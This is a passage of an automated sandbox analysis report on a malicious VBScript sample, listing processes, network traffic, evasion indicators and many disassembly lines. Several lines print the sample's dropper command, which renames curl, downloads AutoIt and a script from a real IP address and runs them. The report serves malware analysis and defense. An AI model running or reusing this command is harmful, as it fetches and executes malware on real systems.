            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042F0E4D6_3_042F0E4D
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434DE5F6_3_0434DE5F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04351EA06_3_04351EA0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436EE9D6_3_0436EE9D
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042F8EE06_3_042F8EE0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04369ED66_3_04369ED6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04346F306_3_04346F30
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04352F206_3_04352F20
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436E8B16_3_0436E8B1
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A98BF6_3_042A98BF
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043268816_3_04326881
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435D8C26_3_0435D8C2
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436E9686_3_0436E968
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436EB6E6_3_0436EB6E
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04339B6B6_3_04339B6B
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436FB696_3_0436FB69
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042F77CE6_3_042F77CE
            Source: C:\bpzs\bpzs.exeCode function: String function: 00007FF7F8D03018 appears 38 times
            Source: C:\bpzs\bpzs.exeCode function: String function: 00007FF7F8D10120 appears 50 times
            Source: C:\bpzs\bpzs.exeCode function: String function: 00007FF7F8D0FADC appears 36 times
            Source: C:\bpzs\bpzs.exeCode function: String function: 00007FF7F8D16714 appears 248 times
            Source: C:\bpzs\bpzs.exeCode function: String function: 00007FF7F8D167AC appears 221 times
            Source: C:\bpzs\Autoit3.exeCode function: String function: 042F994C appears 40 times
            Source: 1.vbsInitial sample: Strings found which are bigger than 50
            Source: 1.vbsVirustotal: Detection: 11%
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\bpzs\bpzs.exe bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351
            Source: C:\Windows\System32\cmd.exeProcess created: C:\bpzs\bpzs.exe bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi
            Source: C:\Windows\System32\cmd.exeProcess created: C:\bpzs\Autoit3.exe Autoit3.exe szkzjr.au3
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\bpzs\bpzs.exe bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\bpzs\bpzs.exe bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\bpzs\Autoit3.exe Autoit3.exe szkzjr.au3Jump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winVBS@10/5@0/1
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D12C90 GetLastError,_errno,__sys_nerr,strerror,strncpy,FormatMessageA,__swprintf_l,_errno,_errno,GetLastError,SetLastError,4_2_00007FF7F8D12C90
            Source: C:\bpzs\Autoit3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_01
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs"
            Source: bpzs.exeString found in binary or memory: curl: try 'curl --help' for more information
            Source: bpzs.exeString found in binary or memory: curl: try 'curl --help' for more information
            Source: bpzs.exeString found in binary or memory: curl: try 'curl --help' for more information
            Source: bpzs.exeString found in binary or memory: curl: try 'curl --help' for more information
            Source: Autoit3.exeString found in binary or memory: The device has succeeded a query-stop and its resource requirements have changed.
            Source: Binary string: wntdll.pdbUGP source: Autoit3.exe, 00000006.00000003.384313885.0000000004206000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000003.384341442.00000000040F4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384687350.000000000427C000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Autoit3.exe, Autoit3.exe, 00000006.00000003.384313885.0000000004206000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000003.384341442.00000000040F4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384687350.000000000427C000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: curl.pdb source: bpzs.exe, 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000004.00000000.366883591.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000002.383565658.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375671616.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.dr

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("cmd", "/c mkdir c:\bpzs & cd /d c:\bpzs & copy", "", "", "0");
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042F9991 push ecx; ret 6_3_042F99A4
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D2E068 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,4_2_00007FF7F8D2E068
            Source: C:\Windows\System32\cmd.exeFile created: C:\bpzs\bpzs.exeJump to dropped file
            Source: C:\bpzs\bpzs.exeFile created: C:\bpzs\Autoit3.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 2351
            Source: unknownNetwork traffic detected: HTTP traffic on port 2351 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 2351
            Source: unknownNetwork traffic detected: HTTP traffic on port 2351 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 2351
            Source: unknownNetwork traffic detected: HTTP traffic on port 2351 -> 49715
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bpzs\Autoit3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bpzs\bpzs.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-29283
            Source: C:\Windows\System32\wscript.exe TID: 1360Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D3450 rdtsc 6_3_042D3450
            Source: C:\bpzs\bpzs.exeAPI coverage: 5.2 %
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: Autoit3.exe, 00000006.00000002.384702251.000000000439B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v video
            Source: Autoit3.exe, 00000006.00000002.384702251.000000000439B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: &microsoft hyper-v video
            Source: wscript.exe, 00000001.00000003.366607062.00000185DFE5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366834023.00000185DFE5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.366567814.00000185DFE5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWo
            Source: wscript.exe, 00000001.00000003.366607062.00000185DFE5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366834023.00000185DFE5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.366567814.00000185DFE5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000001.00000003.366650857.00000185DFE11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.366599997.00000185DFE10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366821514.00000185DFDEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWA
            Source: bpzs.exe, 00000005.00000002.383511096.000001CC77562000.00000004.00000020.00020000.00000000.sdmp, bpzs.exe, 00000005.00000003.383469014.000001CC7755F000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384514086.0000000000D35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll__
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D48BB4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7F8D48BB4
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D2E068 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,4_2_00007FF7F8D2E068
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D3450 rdtsc 6_3_042D3450
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042AA420 mov ecx, dword ptr fs:[00000030h]6_3_042AA420
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432742A mov eax, dword ptr fs:[00000030h]6_3_0432742A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E468 mov eax, dword ptr fs:[00000030h]6_3_0435E468
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434B44A mov ecx, dword ptr fs:[00000030h]6_3_0434B44A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434B44A mov eax, dword ptr fs:[00000030h]6_3_0434B44A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434B44A mov eax, dword ptr fs:[00000030h]6_3_0434B44A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434B44A mov eax, dword ptr fs:[00000030h]6_3_0434B44A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0429E4A9 mov eax, dword ptr fs:[00000030h]6_3_0429E4A9
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043314A5 mov eax, dword ptr fs:[00000030h]6_3_043314A5
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043434AC mov eax, dword ptr fs:[00000030h]6_3_043434AC
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043434AC mov eax, dword ptr fs:[00000030h]6_3_043434AC
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043434AC mov eax, dword ptr fs:[00000030h]6_3_043434AC
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04350490 mov eax, dword ptr fs:[00000030h]6_3_04350490
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432648A mov eax, dword ptr fs:[00000030h]6_3_0432648A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432648A mov eax, dword ptr fs:[00000030h]6_3_0432648A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432648A mov eax, dword ptr fs:[00000030h]6_3_0432648A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D84EC mov eax, dword ptr fs:[00000030h]6_3_042D84EC
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042BC4C1 mov eax, dword ptr fs:[00000030h]6_3_042BC4C1
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042BC4C1 mov eax, dword ptr fs:[00000030h]6_3_042BC4C1
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042BC4C1 mov eax, dword ptr fs:[00000030h]6_3_042BC4C1
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042BC4C1 mov eax, dword ptr fs:[00000030h]6_3_042BC4C1
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043464C4 mov eax, dword ptr fs:[00000030h]6_3_043464C4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]6_3_0435E4C6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]6_3_0435E4C6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]6_3_0435E4C6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]6_3_0435E4C6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]6_3_0435E4C6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]6_3_0435E4C6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]6_3_0435E4C6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]6_3_0435E4C6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]6_3_0435E4C6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]6_3_0435E4C6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]6_3_0435E4C6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]6_3_0435E4C6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]6_3_0435E4C6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]6_3_0435E4C6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043354C0 mov eax, dword ptr fs:[00000030h]6_3_043354C0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043354C0 mov eax, dword ptr fs:[00000030h]6_3_043354C0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043354C0 mov eax, dword ptr fs:[00000030h]6_3_043354C0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043234CA mov eax, dword ptr fs:[00000030h]6_3_043234CA
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043234CA mov eax, dword ptr fs:[00000030h]6_3_043234CA
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043234CA mov eax, dword ptr fs:[00000030h]6_3_043234CA
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043234CA mov eax, dword ptr fs:[00000030h]6_3_043234CA
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D5520 mov eax, dword ptr fs:[00000030h]6_3_042D5520
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433152B mov eax, dword ptr fs:[00000030h]6_3_0433152B
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042E2530 mov eax, dword ptr fs:[00000030h]6_3_042E2530
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A1570 mov eax, dword ptr fs:[00000030h]6_3_042A1570
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434C550 mov eax, dword ptr fs:[00000030h]6_3_0434C550
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434C550 mov eax, dword ptr fs:[00000030h]6_3_0434C550
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043235B0 mov eax, dword ptr fs:[00000030h]6_3_043235B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043235B0 mov eax, dword ptr fs:[00000030h]6_3_043235B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043235B0 mov eax, dword ptr fs:[00000030h]6_3_043235B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043425B0 mov eax, dword ptr fs:[00000030h]6_3_043425B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043425B0 mov eax, dword ptr fs:[00000030h]6_3_043425B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043315BE mov eax, dword ptr fs:[00000030h]6_3_043315BE
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043315BE mov eax, dword ptr fs:[00000030h]6_3_043315BE
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043555A0 mov ecx, dword ptr fs:[00000030h]6_3_043555A0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042AD5B6 mov eax, dword ptr fs:[00000030h]6_3_042AD5B6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042E259B mov eax, dword ptr fs:[00000030h]6_3_042E259B
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04350580 mov eax, dword ptr fs:[00000030h]6_3_04350580
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042E25E0 mov eax, dword ptr fs:[00000030h]6_3_042E25E0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A75F0 mov eax, dword ptr fs:[00000030h]6_3_042A75F0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042C45F0 mov eax, dword ptr fs:[00000030h]6_3_042C45F0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043275DD mov eax, dword ptr fs:[00000030h]6_3_043275DD
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043275DD mov eax, dword ptr fs:[00000030h]6_3_043275DD
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043495C4 mov eax, dword ptr fs:[00000030h]6_3_043495C4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436863B mov ebx, dword ptr fs:[00000030h]6_3_0436863B
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435C612 mov eax, dword ptr fs:[00000030h]6_3_0435C612
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04355607 mov eax, dword ptr fs:[00000030h]6_3_04355607
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04350600 mov eax, dword ptr fs:[00000030h]6_3_04350600
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042C4610 mov eax, dword ptr fs:[00000030h]6_3_042C4610
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A7660 mov eax, dword ptr fs:[00000030h]6_3_042A7660
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04375655 mov eax, dword ptr fs:[00000030h]6_3_04375655
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042DC65B mov eax, dword ptr fs:[00000030h]6_3_042DC65B
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042DC65B mov eax, dword ptr fs:[00000030h]6_3_042DC65B
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042AD650 mov eax, dword ptr fs:[00000030h]6_3_042AD650
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042AD650 mov eax, dword ptr fs:[00000030h]6_3_042AD650
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043556B1 mov eax, dword ptr fs:[00000030h]6_3_043556B1
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434C6B0 mov eax, dword ptr fs:[00000030h]6_3_0434C6B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434C6B0 mov eax, dword ptr fs:[00000030h]6_3_0434C6B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434C6B0 mov eax, dword ptr fs:[00000030h]6_3_0434C6B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434C6B0 mov eax, dword ptr fs:[00000030h]6_3_0434C6B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436C6A2 mov eax, dword ptr fs:[00000030h]6_3_0436C6A2
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436C6A2 mov eax, dword ptr fs:[00000030h]6_3_0436C6A2
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436C6A2 mov eax, dword ptr fs:[00000030h]6_3_0436C6A2
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436C6A2 mov eax, dword ptr fs:[00000030h]6_3_0436C6A2
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435C693 mov eax, dword ptr fs:[00000030h]6_3_0435C693
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04323689 mov eax, dword ptr fs:[00000030h]6_3_04323689
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04323689 mov eax, dword ptr fs:[00000030h]6_3_04323689
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04323689 mov eax, dword ptr fs:[00000030h]6_3_04323689
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04323689 mov ecx, dword ptr fs:[00000030h]6_3_04323689
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04323689 mov eax, dword ptr fs:[00000030h]6_3_04323689
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04323689 mov eax, dword ptr fs:[00000030h]6_3_04323689
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432B6F0 mov eax, dword ptr fs:[00000030h]6_3_0432B6F0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435C6FF mov eax, dword ptr fs:[00000030h]6_3_0435C6FF
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043216D0 mov eax, dword ptr fs:[00000030h]6_3_043216D0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043216D0 mov eax, dword ptr fs:[00000030h]6_3_043216D0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043216D0 mov ecx, dword ptr fs:[00000030h]6_3_043216D0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043216D0 mov eax, dword ptr fs:[00000030h]6_3_043216D0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043216D0 mov eax, dword ptr fs:[00000030h]6_3_043216D0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432F6D4 mov eax, dword ptr fs:[00000030h]6_3_0432F6D4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04331730 mov eax, dword ptr fs:[00000030h]6_3_04331730
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04327720 mov eax, dword ptr fs:[00000030h]6_3_04327720
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04327720 mov eax, dword ptr fs:[00000030h]6_3_04327720
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04327720 mov eax, dword ptr fs:[00000030h]6_3_04327720
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04327720 mov eax, dword ptr fs:[00000030h]6_3_04327720
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D0730 mov eax, dword ptr fs:[00000030h]6_3_042D0730
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042DE700 mov eax, dword ptr fs:[00000030h]6_3_042DE700
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04367704 mov eax, dword ptr fs:[00000030h]6_3_04367704
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04367704 mov eax, dword ptr fs:[00000030h]6_3_04367704
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04342700 mov eax, dword ptr fs:[00000030h]6_3_04342700
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04345700 mov eax, dword ptr fs:[00000030h]6_3_04345700
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04345700 mov eax, dword ptr fs:[00000030h]6_3_04345700
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04353700 mov eax, dword ptr fs:[00000030h]6_3_04353700
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432870A mov edi, dword ptr fs:[00000030h]6_3_0432870A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042CB710 mov eax, dword ptr fs:[00000030h]6_3_042CB710
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042CB710 mov eax, dword ptr fs:[00000030h]6_3_042CB710
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434877A mov edi, dword ptr fs:[00000030h]6_3_0434877A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434877A mov eax, dword ptr fs:[00000030h]6_3_0434877A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432F763 mov eax, dword ptr fs:[00000030h]6_3_0432F763
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04338760 mov eax, dword ptr fs:[00000030h]6_3_04338760
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04338760 mov eax, dword ptr fs:[00000030h]6_3_04338760
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436D765 mov eax, dword ptr fs:[00000030h]6_3_0436D765
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436D765 mov eax, dword ptr fs:[00000030h]6_3_0436D765
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436D765 mov eax, dword ptr fs:[00000030h]6_3_0436D765
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433C747 mov eax, dword ptr fs:[00000030h]6_3_0433C747
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04328749 mov edi, dword ptr fs:[00000030h]6_3_04328749
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]6_3_043437B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]6_3_043437B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]6_3_043437B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]6_3_043437B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]6_3_043437B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]6_3_043437B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]6_3_043437B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]6_3_043437B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042E07A4 mov eax, dword ptr fs:[00000030h]6_3_042E07A4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042E07A4 mov eax, dword ptr fs:[00000030h]6_3_042E07A4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042E07A4 mov eax, dword ptr fs:[00000030h]6_3_042E07A4
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043207A0 mov ecx, dword ptr fs:[00000030h]6_3_043207A0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043287A0 mov eax, dword ptr fs:[00000030h]6_3_043287A0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043287A0 mov eax, dword ptr fs:[00000030h]6_3_043287A0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432E7AC mov eax, dword ptr fs:[00000030h]6_3_0432E7AC
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042E5787 mov eax, dword ptr fs:[00000030h]6_3_042E5787
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042C7780 mov eax, dword ptr fs:[00000030h]6_3_042C7780
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433A786 mov eax, dword ptr fs:[00000030h]6_3_0433A786
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435C780 mov eax, dword ptr fs:[00000030h]6_3_0435C780
